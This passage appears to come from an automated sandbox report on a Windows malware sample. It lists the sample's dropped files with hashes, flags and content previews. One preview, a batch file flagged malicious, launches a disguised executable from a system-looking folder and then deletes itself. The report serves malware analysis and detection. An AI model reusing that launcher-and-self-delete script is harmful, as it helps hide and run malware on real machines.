Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fdsN8iw6WG.exe.log

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HKGHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0qGqZ4vtd
MD5:	F3475F6FF1F713C7C9DAACC1DF623E58
SHA1:	AED39B5923CCC56514F33B73DF64A13706CE0DAE
SHA-256:	3AE4E8E8ADBD758B6E39EA3D7B8E680F3160F6E5D48DAF1F0419236F1978CDCE
SHA-512:	65B0309ABFBEFD2A749F3DEDBEE74CF5160BF42049C8A67AE30DB786092EC3553F1C8F16C5C40004650CB3926C84F061E37C796CA92266F582B3E48D5A237C32
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log

Download File

Process:	C:\Program Files\Microsoft\sihost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.005753878328145
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
MD5:	81D32E8AE893770C4DEA5135D1D8E78D
SHA1:	CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
SHA-256:	6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
SHA-512:	FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulVmdtZ:NllUM
MD5:	013016A37665E1E37F0A3576A8EC8324
SHA1:	260F55EC88E3C4D384658F3C18C7FDEF202E47DD
SHA-256:	20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
SHA-512:	99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\3a401533b82e2cb9c9bc589aa6ee01300983b035

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	244
Entropy (8bit):	5.779374902706169
Encrypted:	false
SSDEEP:	6:dkctMI6AqY4c/6vueNNQaxC29CJqiRSpXKZBkk:zJ6blvRaT9JqyoK8k
MD5:	955A2B66954F10C7818D298AC371CB54
SHA1:	E3E83BAC399259FF42395B916E8483846BA55FA0
SHA-256:	6DF8EAD195481A1B68E4AA54F48D81DB2BA9D3E27251F7376E0B043B1B7C8C90
SHA-512:	BCDF9541D4C3C8E00E602FDA65D96E9339B2244ECD212E82ED501DE5E900425B0B19FED02B48C17AF19E011D7EBC70FA35FE88DFB092DC577403169BBA913772
Malicious:	false
Preview:	H4sIAAAAAAAEAKWPwQqCQBRFf0VcR8uIdqUmLQpJzKDXYnSeOjj65M2kfn7WKiIIan0O93AvrrcCiJhKFo2zVRoNwF7lTIYKC2BURcbOcUR39klNVStpME5EbEWm0fGxV/mDyKDysnOw3iVe0uk+k5SebBOO37diJTETDBBXglE6oZAl2kk43lqrGtww1cgvO4lBnrDQBbV/lX968Vb30dSWOoBCmsNSDYs0fMrXO74+Ne9rAQAA

C:\Users\user\AppData\Local\Temp\AY9NvOnlHp

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.5638561897747225
Encrypted:	false
SSDEEP:	3:8ZVB7BdFJU:8rB71W
MD5:	A31FC165544A20CA5A029F0334C8193F
SHA1:	318850B1858856116C5C9613993F41B550EC8B5C
SHA-256:	D7281FA9305F26A75BAFB501B82D0574F867EF670EB5C4811562F4DDB51CE120
SHA-512:	D07B4B3C33F3D2624D43413CFBC9830EA9822696DA0B0E08AAABFE053F0434545B92CF649048131C190505E2A169AD29C35629D27D60AD5D5C6EBA4AABB38441
Malicious:	false
Preview:	XbCZzJtpOI45KHVscNB7SlKaE

C:\Users\user\AppData\Local\Temp\RES34F8.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Fri Oct 4 16:46:30 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1928
Entropy (8bit):	4.606545061341708
Encrypted:	false
SSDEEP:	24:HfK9AaLzcW4f8HMwKqxmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ecN:naLznW8zKqxmslmuulB+hnqXSfbNtmh7
MD5:	8E6897CD78B1F2CFDB65ADB320CDD564
SHA1:	44DEC215C04D8B0DF5DAA09164B0D6AF2171F3B5
SHA-256:	4B87B06778A59063A70083347A2D3DE846758D30147EEAAE8281768EAF49D19F
SHA-512:	84A2C03CFB0F3DC592CB647CCDC300F635CB55BDF734B146543E45B93196981A80F7095639748F371D9FE702C49B0D92C163EDB6675CEEC89C5907C06C52E89A
Malicious:	false
Preview:	L......g.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC13EEC4598AE74082ADE16A1F2183AE80.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES34F8.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.

C:\Users\user\AppData\Local\Temp\RES38D0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Fri Oct 4 16:46:31 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1956
Entropy (8bit):	4.549538416540628
Encrypted:	false
SSDEEP:	24:HsO9/OzhAqHewKqxmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:cz+qdKqxmEluOulajfqXSfbNtmh1Z
MD5:	718EEF3268CD4A7A3B4A24BC669962BB
SHA1:	1FA823B2FCD0056FC922CD860D28EE91D9EB2682
SHA-256:	8B7D381C7B9822F25AEC109E0CECFF36A387372518C6AE2C52EBD95BB2EDB1A6
SHA-512:	29C479019EFC3B386FFACCF9079C5A1D428DD60463DB20CBE805014C92598963CFECE79123F78C66785C950A451A0A44516E416C3F86A4E85D8029328390BDDF
Malicious:	false
Preview:	L......g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...\|...............@..@........=....c:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES38D0.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	247
Entropy (8bit):	5.221560115031016
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEimKQkS0G/BTBCvKOZG1923fJJcFq:HTg9uYDEi9dG/BoZBJcw
MD5:	584FC07B654685E3FEC1804E8470F0F6
SHA1:	AC58320F8906B0C2EE86EF2AD65DFB6AC9D3CFB9
SHA-256:	C1ADA6095AA5B7B7B2DAC8B4CB911B687FB2C77C5F13D3DB3A7DD942B2A0E310
SHA-512:	A4284230ECF74964DCC2B95B7E8030629A31BED692ED8BEB26F8B0F0B15DC7B35D2B61C38EF17CCF484C4D39D490E6C0E357AA0C13F351BB30D989C8D052E0BF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\V10Cviyryl.bat"

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tajbc0f.e5j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dobmehz.24v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3itvei3k.yet.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3j3f3kin.tx4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44ldsf1b.pc4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bqqyszl.zwx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jjukrcd.43p.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tcnu5by.qsy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cg4pdg1a.qja.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjhhrvcz.li2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czye3rc5.a23.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duylgtxd.hgo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ertewja2.3zs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4k2tofd.bky.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj5zh10i.fgl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcqwktpf.3r5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuzo2tp4.ws0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmeqz20l.ga1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
